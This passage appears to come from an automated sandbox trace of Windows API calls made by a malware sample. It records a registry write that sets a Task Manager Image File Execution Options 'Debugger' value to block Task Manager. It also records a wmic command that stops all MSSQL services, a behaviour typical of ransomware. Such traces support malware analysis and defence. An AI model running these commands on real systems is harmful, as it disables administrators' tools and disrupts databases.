Options\\taskmgr.exe") returned 85 [0257.295] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0257.295] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0257.295] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0257.295] StrChrIW (lpStart="Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0257.295] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0257.295] StrChrIW (lpStart="Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0257.295] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0257.295] StrChrIW (lpStart="CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\Image File Execution Options\\taskmgr.exe" [0257.295] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0257.295] StrChrIW (lpStart="Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\taskmgr.exe" [0257.295] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0257.295] StrChrIW (lpStart="taskmgr.exe", wMatch=0x5c) returned 0x0 [0257.295] RtlRestoreLastWin32Error () returned 0x259000 [0257.295] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0257.295] RtlRestoreLastWin32Error () returned 0x259000 [0257.295] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0257.295] GetProcessHeap () returned 0x6f0000 [0257.295] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0xac) returned 0x6f9460 [0257.295] GetProcessHeap () returned 0x6f0000 [0257.295] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0xd8) returned 0x6f9518 [0257.295] GetProcessHeap () returned 0x6f0000 [0257.295] GetProcessHeap () returned 0x6f0000 [0257.295] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f9430) returned 1 [0257.295] GetProcessHeap () returned 0x6f0000 [0257.295] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f9430) returned 0x28 [0257.295] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f9430) returned 1 [0257.296] GetProcessHeap () returned 0x6f0000 [0257.296] GetProcessHeap () returned 0x6f0000 [0257.296] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f42c0) returned 1 [0257.296] GetProcessHeap () returned 0x6f0000 [0257.296] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f42c0) returned 0xb6 [0257.296] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f42c0) returned 1 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0257.296] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0257.296] lstrlenW (lpString="Debugger") returned 8 [0257.296] GetProcessHeap () returned 0x6f0000 [0257.296] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x12) returned 0x6f9aa8 [0257.296] lstrlenW (lpString="Debugger") returned 8 [0257.296] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0257.296] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0257.296] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.296] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0257.296] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0257.296] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0257.296] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0257.297] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.297] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0257.297] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0257.297] lstrlenW (lpString="REG_SZ") returned 6 [0257.297] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0257.297] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0257.297] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0257.297] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0257.297] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0257.297] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0257.297] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0257.297] LocalFree (hMem=0x6f7be0) returned 0x0 [0257.297] RtlRestoreLastWin32Error () returned 0x259000 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0257.297] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0257.298] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0257.298] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0257.298] lstrlenW (lpString="Hotkey Disabled") returned 15 [0257.298] GetProcessHeap () returned 0x6f0000 [0257.298] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x20) returned 0x6f9430 [0257.298] RtlRestoreLastWin32Error () returned 0x259000 [0257.298] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0xdf7a4, lpdwDisposition=0xdf774 | out: phkResult=0xdf7a4*=0xe0, lpdwDisposition=0xdf774*=0x1) returned 0x0 [0257.298] RegQueryValueExW (in: hKey=0xe0, lpValueName="Debugger", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0257.298] lstrlenW (lpString="Hotkey Disabled") returned 15 [0257.298] RegSetValueExW (in: hKey=0xe0, lpValueName="Debugger", Reserved=0x0, dwType=0x1, lpData="Hotkey Disabled", cbData=0x20 | out: lpData="Hotkey Disabled") returned 0x0 [0257.298] RegCloseKey (hKey=0xe0) returned 0x0 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f9460) returned 1 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f9460) returned 0xac [0257.299] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f9460) returned 1 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f9518) returned 1 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f9518) returned 0xd8 [0257.299] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f9518) returned 1 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f9aa8) returned 1 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f9aa8) returned 0x12 [0257.299] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f9aa8) returned 1 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f9430) returned 1 [0257.299] GetProcessHeap () returned 0x6f0000 [0257.299] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f9430) returned 0x20 [0257.299] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f9430) returned 1 [0257.299] RtlRestoreLastWin32Error () returned 0x259000 [0257.299] GetLastError () returned 0x0 [0257.299] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0xdf750, nSize=0x0, Arguments=0x0 | out: lpBuffer="䋀o\r⩿\x89宼\x89೨f") returned 0x27 [0257.301] GetLastError () returned 0x0 [0257.301] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0257.301] GetProcessHeap () returned 0x6f0000 [0257.301] GetProcessHeap () returned 0x6f0000 [0257.301] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f4748) returned 1 [0257.301] GetProcessHeap () returned 0x6f0000 [0257.301] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f4748) returned 0x2 [0257.301] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f4748) returned 1 [0257.301] GetProcessHeap () returned 0x6f0000 [0257.301] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0xc, Size=0x50) returned 0x6f4318 [0257.301] RtlRestoreLastWin32Error () returned 0x259000 [0257.301] LocalFree (hMem=0x6f42c0) returned 0x0 [0257.301] __iob_func () returned 0x776f2608 [0257.301] _fileno (_File=0x776f2628) returned 1 [0257.301] _errno () returned 0x6605b0 [0257.302] _get_osfhandle (_FileHandle=1) returned 0x1ec [0257.302] _errno () returned 0x6605b0 [0257.302] GetFileType (hFile=0x1ec) returned 0x3 [0257.302] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0257.302] GetConsoleOutputCP () returned 0x1b5 [0257.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0257.303] GetConsoleOutputCP () returned 0x1b5 [0257.303] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0x89d370, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The operation completed successfully.\r\n", lpUsedDefaultChar=0x0) returned 39 [0257.303] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 39 [0257.304] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0257.304] GetProcessHeap () returned 0x6f0000 [0257.304] GetProcessHeap () returned 0x6f0000 [0257.304] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f3c08) returned 1 [0257.304] GetProcessHeap () returned 0x6f0000 [0257.304] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f3c08) returned 0xbc [0257.304] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f3c08) returned 1 [0257.304] GetProcessHeap () returned 0x6f0000 [0257.304] GetProcessHeap () returned 0x6f0000 [0257.304] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f7d00) returned 1 [0257.304] GetProcessHeap () returned 0x6f0000 [0257.304] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f7d00) returned 0x10 [0257.304] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f7d00) returned 1 [0257.304] GetProcessHeap () returned 0x6f0000 [0257.304] GetProcessHeap () returned 0x6f0000 [0257.305] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f4a20) returned 1 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f4a20) returned 0x14 [0257.305] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f4a20) returned 1 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f3be0) returned 1 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f3be0) returned 0x1e [0257.305] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f3be0) returned 1 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f7ce8) returned 1 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f7ce8) returned 0x10 [0257.305] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f7ce8) returned 1 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f4a00) returned 1 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f4a00) returned 0x14 [0257.305] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f4a00) returned 1 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f4318) returned 1 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.305] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f4318) returned 0x50 [0257.305] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f4318) returned 1 [0257.305] GetProcessHeap () returned 0x6f0000 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f4480) returned 1 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f4480) returned 0x14 [0257.306] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f4480) returned 1 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f4240) returned 1 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f4240) returned 0x14 [0257.306] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f4240) returned 1 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f3e20) returned 1 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f3e20) returned 0x14 [0257.306] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f3e20) returned 1 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f3e40) returned 1 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f3e40) returned 0x14 [0257.306] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f3e40) returned 1 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f7d18) returned 1 [0257.306] GetProcessHeap () returned 0x6f0000 [0257.306] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f7d18) returned 0x10 [0257.306] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f7d18) returned 1 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f3e60) returned 1 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f3e60) returned 0x14 [0257.307] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f3e60) returned 1 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f4500) returned 1 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f4500) returned 0x14 [0257.307] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f4500) returned 1 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f4520) returned 1 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f4520) returned 0x14 [0257.307] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f4520) returned 1 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f4540) returned 1 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f4540) returned 0x14 [0257.307] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f4540) returned 1 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f7bb0) returned 1 [0257.307] GetProcessHeap () returned 0x6f0000 [0257.307] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f7bb0) returned 0x10 [0257.308] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f7bb0) returned 1 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f49e0) returned 1 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f49e0) returned 0x14 [0257.308] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f49e0) returned 1 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f4a40) returned 1 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f4a40) returned 0x14 [0257.308] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f4a40) returned 1 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f7d30) returned 1 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f7d30) returned 0x10 [0257.308] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f7d30) returned 1 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f4b90) returned 1 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f4b90) returned 0x14 [0257.308] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f4b90) returned 1 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.308] HeapValidate (hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6f7c88) returned 1 [0257.308] GetProcessHeap () returned 0x6f0000 [0257.309] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f7c88) returned 0x10 [0257.309] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f7c88) returned 1 [0257.309] exit (_Code=0) Thread: id = 212 os_tid = 0xda0 Process: id = "15" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x2724f000" os_pid = "0xed8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 213 os_tid = 0x1010 [0257.486] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0257.486] __set_app_type (_Type=0x1) [0257.486] __p__fmode () returned 0x776f3c14 [0257.486] __p__commode () returned 0x776f49ec [0257.486] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0257.486] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0257.487] ??0CHString@@QAE@XZ () returned 0xa685ec [0257.487] malloc (_Size=0x18) returned 0x870ee0 [0257.487] malloc (_Size=0x38) returned 0x870f00 [0257.487] malloc (_Size=0x28) returned 0x870f40 [0257.489] malloc (_Size=0x18) returned 0x870f70 [0257.489] malloc (_Size=0x24) returned 0x870f90 [0257.491] malloc (_Size=0x18) returned 0x870fc0 [0257.491] malloc (_Size=0x18) returned 0x870fe0 [0257.491] ??0CHString@@QAE@XZ () returned 0xa688fc [0257.491] malloc (_Size=0x18) returned 0x871000 [0257.491] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0257.492] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0257.492] _onexit (_Func=0xa5f370) returned 0xa5f370 [0257.492] _onexit (_Func=0xa5f380) returned 0xa5f380 [0257.492] _onexit (_Func=0xa5f390) returned 0xa5f390 [0257.492] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0257.492] ResolveDelayLoadedAPI () returned 0x74a22590 [0257.493] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0257.498] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0257.511] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x4e48a8) returned 0x0 [0257.542] GetCurrentProcess () returned 0xffffffff [0257.542] OpenProcessToken (in: 